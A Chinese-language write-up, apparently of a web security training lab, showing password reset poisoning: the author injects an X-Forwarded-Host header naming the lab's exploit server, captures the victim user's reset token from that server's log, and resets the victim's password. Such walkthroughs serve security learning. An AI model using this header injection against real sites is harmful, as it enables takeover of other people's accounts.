第十一关 通过中间件重置密码中毒
这一关在重置密码的部分对temp-forgot-password-token值进行了校验,temp-forgot-password-token的值必须与用户对应才可以修改密码
提示:1、靶场容易受到密码重置中毒的影响
2、有账户wiener:peter
受害者用户: carlos
具体操作
1、点击忘记密码后,跳转到输入用户名发送重置密码邮件链接的页面

2、生成邮件链接,前往攻击机 (漏洞利用服务器) 查看

3、点击邮箱查看

4、点击重置密码链接查看

5、跳转到重置密码的页面

6、输入重置的密码登录成功

以上就是一个完整的重置密码的业务流程
7、找到触发忘记密码的POST /forgot-password请求的数据包,发往repeater

8、然后返回repeater,构造请求头X-Forwarded-Host
构造之前先去攻击机(漏洞利用服务器)那里复制URL
https://exploit-0a08008e03729d1f80ff119f01dc005f.exploit-server.net

返回repeater,添加带有漏洞利用服务器 URL 的X-Forwarded-Host标头,用户参数改成受害者carlos
X-Forwarded-Host: exploit-0a08008e03729d1f80ff119f01dc005f.exploit-server.net
页面返回200ok,显示已发送邮件

然后去攻击机里的日志进行查看,看有没有获取到受害者的token值

如图日志,已经获取到了受害者的token值
temp-forgot-password-token=b5bpa17w9frbl27k1fe0bf1pz5n33vf2

然后又返回邮件页面,点击链接

点击链接后,跳转到重置密码的页面
如图1、替换token值后,刷新一下
2、刷新后,就是受害者用户了,那么再重新设置密码

